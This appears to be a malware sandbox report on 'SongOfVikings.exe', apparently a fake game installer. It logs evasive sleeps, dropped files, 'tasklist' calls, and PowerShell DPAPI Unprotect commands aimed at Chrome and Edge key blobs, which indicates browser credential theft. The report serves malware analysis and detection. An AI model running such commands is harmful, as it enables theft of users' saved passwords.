Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3757	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2007	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3645
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 423

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\nsis7z.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\StdUtils.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\vk_swiftshader.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\vulkan-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\SongOfVikings\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\resources\elevate.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\db56a95c-619a-410d-ad51-8448947b0929.tmp.node	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\f1a1d769-375b-46b2-ad93-df5ca2abe3a4.tmp.node	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\SongOfVikings\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\SongOfVikings\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\SpiderBanner.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\d3dcompiler_47.dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5264	Thread sleep count: 3757 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5264	Thread sleep count: 2007 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6824	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6788	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2476	Thread sleep count: 3645 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2476	Thread sleep count: 423 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7432	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2132	Thread sleep time: -922337203685477s >= -30000s

Queries keyboard layouts

Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809

Source: C:\Users\user\Desktop\SongOfVikings.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File Volume queried: C:\Users\user\AppData\Local\Programs\SongOfVikings FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File Volume queried: C:\Users\user\AppData\Local\Programs\SongOfVikings FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File Volume queried: C:\Users\user FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File Volume queried: C:\Users\user FullSizeInformation

Source: C:\Users\user\Desktop\SongOfVikings.exe	Code function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004059CC
Source: C:\Users\user\Desktop\SongOfVikings.exe	Code function: 0_2_004065FD FindFirstFileW,FindClose,	0_2_004065FD
Source: C:\Users\user\Desktop\SongOfVikings.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\SongOfVikings.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Programs\SongOfVikings	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Programs	Jump to behavior

Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMware
Source: SongOfVikings.exe, 00000000.00000003.1907195515.00000000054B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ::$DATAca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}g,K
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: IIAMDARMAppleBroadcomGoogleIntelMesaMicrosoftNVIDIAImagination TechnologiesQualcommSamsung Electronics Co., Ltd.VivanteVMwareVirtIOTestX
Source: SongOfVikings.exe, 00000000.00000003.1839965990.00000000051BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmncVMware Screen Codec / VMware Videovp5On2 VP5vp6On2 VP6vp6fOn2 VP6 (Flash version)targaTruevision Targa imageimage/x-targaimage/x-tga
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: (IsLinux() && isVMWare) \|\| (IsAndroid() && isNvidia) \|\| (IsAndroid() && GetAndroidSdkLevel() < 27 && IsAdreno5xxOrOlder(functions)) \|\| (IsAndroid() && IsMaliT8xxOrOlder(functions)) \|\| (IsAndroid() && IsMaliG31OrOlder(functions))
Source: SongOfVikings.exe, 00000000.00000003.1839965990.00000000051BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Screen Codec / VMware Video

Source: C:\Users\user\Desktop\SongOfVikings.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\SongOfVikings.exe

Process information queried: ProcessInformation

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'CurrentUser')"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'CurrentUser')"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\SongOfVikings" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1924 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\SongOfVikings" --mojo-platform-channel-handle=2440 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\SongOfVikings" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1904 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'CurrentUser')	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'CurrentUser')

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'currentuser')"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'currentuser')
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'currentuser')"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'currentuser')
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "c:\users\user\appdata\local\programs\songofvikings\songofvikings.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\songofvikings" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaabgaaaaaaaaagaaaaaaaaaaiaaaaaaaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1924 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "c:\users\user\appdata\local\programs\songofvikings\songofvikings.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\songofvikings" --mojo-platform-channel-handle=2440 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "c:\users\user\appdata\local\programs\songofvikings\songofvikings.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="c:\users\user\appdata\roaming\songofvikings" --gpu-preferences=uaaaaaaaaadoaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaacqaaaaaaaaaaaaaaaaaaaaaaaaabgaaaaaaaaagaaaaaaaaaaiaaaaaaaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1904 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'currentuser')"	Jump to behavior
